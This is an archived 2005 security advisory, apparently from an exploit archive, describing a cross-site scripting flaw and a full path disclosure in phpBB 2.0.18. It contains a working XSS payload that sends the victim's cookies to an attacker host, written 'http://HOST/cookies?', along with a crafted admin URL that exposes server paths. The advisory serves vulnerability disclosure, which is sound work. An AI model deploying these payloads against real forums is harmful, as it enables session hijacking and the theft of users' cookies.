what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

phpBB2018.txt

phpBB2018.txt
Posted Dec 27, 2005
Authored by Maksymilian Arciemowicz | Site securityreason.com

phpBB 2.0.18 is susceptible to cross site scripting and path disclosure issues.

tags | exploit, xss
SHA-256 | e1df557dc552d0f29527c2970c4b3bd38e24684dc6429892295fcf7bbdeab84d

phpBB2018.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
from securityreason.com TEAM

- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source
bulletin board package. phpBB has a user-friendly interface, simple and
straightforward administration panel, and helpful FAQ. Based on the powerful
PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or
Access/ODBC database servers, phpBB is the ideal free community solution for
all web sites.
Contact with author http://www.phpbb.com/about.php.

- --- 1. XSS ---
If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile
"Always allow HTML: YES" or are you Guest

that you can use this tags:

<B C=">" onmouseover="alert('SecurityReason.Com')" X="<B "> H E L O </B>

Exploit:

<B C=">"
onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)"
X="<B "> H A L O </B>

and have you cookies.

- --- 2. Full Path Disclosure ---
In file admin/admin_disallow.php is

- -25-31---
if( !empty($setmodules) )
{
$filename = basename(__FILE__);
$module['Users']['Disallow'] = append_sid($filename);

return;
}
- -25-31---

function append_sid() dosen't exists. And if you have:

register_globals = On
display_errors = On

Try to go:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1

- -RESULT ERROR---
Fatal error: Call to undefined function: append_sid()
in /www/2018/phpBB2/admin/admin_disallow.php on line 28
- -RESULT ERROR---

- --- 3. Greets ---
sp3x

- --- 4.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
securityreason.com TEAM
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D
/0u14EN2sQAh1Bwu0yvT48Q=
=lsL8
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    25 Files
  • 16
    Aug 16th
    3 Files
  • 17
    Aug 17th
    6 Files
  • 18
    Aug 18th
    4 Files
  • 19
    Aug 19th
    12 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close